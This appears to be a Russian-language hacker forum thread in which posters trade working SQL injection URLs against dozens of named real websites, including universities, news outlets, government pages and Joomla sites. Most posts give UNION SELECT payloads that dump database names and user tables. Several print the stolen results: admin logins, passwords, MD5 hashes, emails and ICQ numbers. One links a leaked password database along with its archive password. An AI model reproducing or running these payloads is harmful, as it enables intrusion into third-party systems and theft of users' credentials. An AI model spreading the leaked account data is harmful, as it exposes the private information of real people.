http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.
frugalreader.com что-то типа обменника книг для частников (SQL-inj + БД) SQL-inj: Code: http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn= БД (расшифровано 4185 из 4613 (почти 91%)) паролей: http://dinar007.by.ru/hbd/base_frugalreader.zip Пароль к архиву: antichat.ru
www.lrn.ru Code: http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/* lrn_ru@localhost:lrn_ru:5.0.46-log/2 (file_priv нет) Code: http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/* установочный путь: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php админка: http://www.lrn.ru/admin (как через нее залить шелл я не догнал) Vitls:gjhextybt
HTML: http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/* [email protected]:alteregotutby
HTML: http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/* 5.0.24a climatea_climat@localhost climatea_climat усть доступ к schema , но я несмог найти админа
channelg.tv HTML: http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54 channelg@localhost:4.0.24:channelg Там CMS какая-то... uginfo.sfedu.ru HTML: http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/ sgcs.fcm.unc.edu.ar HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/ HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/ user - postgres version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5) HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/ - названия таблиц HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/ - названия колонок
Code: http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/* netlink_netltbn@localhost:netlink_netltbn:5.0.24a Code: http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/* homelogin@localhost:homeopath:4.1.22
сессия съела мой мозг :\ --- http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/* 4.1.22-standard/chatman_chatman/chatman_u51279@localhost ----------------------------------------------------------------------------- http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/* 4.1.21/mmp/mmp@localhost http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3,4,5,6,7,8,9,10+from+users/* логин/пароль admin/mrkroz2909 -------------------------------------------------------------------------- А это аццкие специалисты сетевых технологий угрожают гнусным хакерам http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*
http://www.peekvid.com Code: http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/* 5.0.22root@kentuckyprivpeekvid_v2 Code: http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/* Root67ef27e02618b87a:ZAQxsw
http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()) 5.0.51/hdds/hdds@localhost http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email,icq)+from+forums_auth+limit+0,1 логин/хеш/мейл/асику Cavaler/50cc3872ca61179a359e6263a3fd3d43/[email protected]/48555995
газета Труд кому то надо? ну тогда держите - Code: http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/* trudinfo@localhost 4.1.21-log
MSSQL _http://www.treasury.gov.au/content/tax_treaties.asp?ContentID=759' _http://www.nsw.gov.au/Business_results.asp?SEARCH_KEYS='OPER_LCYCLE_BUSINESS_SNSW&DISPLAY1=Business+Life+Cycle&DISPLAY2=Operating+a+Business _http://www.montgomerycountymd.gov/csltmpl.asp?url='/content/council/index.asp _http://web.nsc.gov.tw/default.asp?mp=7' _http://www.pme.gov.sa/warnning/file.asp?ID=68' _http://www.izkor.gov.il/izkor86.asp?t=0'&dir=0&i=0&pab=4332&nab=91086&pdt=8318&ndt=9 MySQL _http://www.wiredforhealth.gov.uk/cat.php?catid=842' _http://www.monitor-nhsft.gov.uk/publications.php?cat=8' _http://www.cszx.gov.cn/art/catb.php?catid=1' _http://www.yarriambiack.vic.gov.au/council_services/sub_menu.php?subMenuId=119&menuId=27' _http://www.tcvn.gov.vn/en/index.php?p=cat&cid=35' _http://porx.rambler.ru/porx/viewprofile.php?user=%D0%B4%D0%BE%D0%BB' _http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1390'
Code: http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))-- таблицы - henna и drops_5 дальше подобрать не смог ибо запятые жестоко фильтруются. Пробовал различные методы в т.ч 0x2c , сhar'ы и тд. кто найдёт замену этой запятой плз скиньте инфу сюда или в личку)
Code: http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*
Code: http://adeptweb.info/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.budshop.com.ua/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://kadrovest.ru/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://hostofmine.net/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.akademikerzeitung.ch/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.jerseyrecruitment.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.identitytextiles.com/2007/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://tryanotherangle.com/joomla/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.ilm-media.at/portal/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.worldfashioncouncil.org/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.sagentpharma.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://www.innoventions.co.za/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* http://chinstudent.org/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/* http://www.zeros2heroes.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/* http://www.jovita.lt/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/* http://www.stopthetraffik.nl/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/* http://www.circusfrog.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/* http://portalul.eu/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
CMS I-cont _________________________________ http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+maybach_users/* http://www.emspost.ru/en/news/archive/?id=-498+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ems_users+limit+2,1/* http://serpentor.ru/news/?id=-368+union+select+1,concat(login,0x3a,pwd),3,4,5,6,7,8+from+serpentor_users+limit+1,1/* http://trinity-cis.com/en/news/?id=-12+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11,12+from+trinity_users/* http://www.marcor.ru/news/?id=-21+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+marcor_users/* http://www.relod.ru/news/?id=-109+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+relod_users/* http://www.itclinic.ru/press_center/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+itclinic_users/* http://www.rochet.ru/news/?id=-379+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+rochet_users/* http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+gluon_users/* http://www.schnittke-mgim.ru/news/?id=-26+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+shnitke_users/* http://www.eurotemp.ru/news/?id=-16+union+select+1,2,concat(login,0x3a,pwd),4,5+from+eurotemp_users/* http://www.samaya-samaya.ru/company/news/?id=-22+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+sam_users/* http://www.mostd.ru/news/?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5+from+mostd_users/* http://ikrs.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ikrs_users/* http://www.1tort.ru/news/?id=-366+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+1tort_users/* http://neftebor.ru/news/?id=-17+union+select+1,2,3,concat(login,0x3a,pwd),5,6,7,8,9+from+neftebor_users/* http://www.harmline.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+harmony_users/* http://www.eko-sad.ru/news/?id=-395+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ecosad_users/* http://www.panoramakino.ru/news/?id=-374+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+panorama_users/* http://www.hotelpearl.ru/news/?id=-13+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+hotelpearl_users/* http://www.mp218.ru/articles/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+mp218_users/* http://digitec.ru/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+digitec_users/* http://www.japanplast.ru/news/?id=-7+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+japanplast_users/* http://www.angic.ru/news/?id=-5+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+angic_users/* http://dvector.ru/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+dvector_users/* http://www.lucsor.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+lucsor_users/* http://www.nstkani.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+nika_users/* http://omnia-insurance.com/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+omnia_users/* http://www.leon-beton.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+leon_users/* http://www.zalogu.net/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+zalogu_users/* http://www.adanilov.ru/news/?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd),8,9,10,11+from+danilov_users/* http://www.melodytour.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+melody_users/* http://www.abarysheva.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+barysheva_users/* http://www.torshin.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+torshin_users/* _________________________________ виновник этого безобразия : http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+imarket_users/* _________________________________ админки находятся по адресу http://site.ru/adm хеш паролей простой md5 _________________________________ p.s взломано при помощи телефона nokia N70,браузера Opera-mini(mod) и... не совсем кривых рук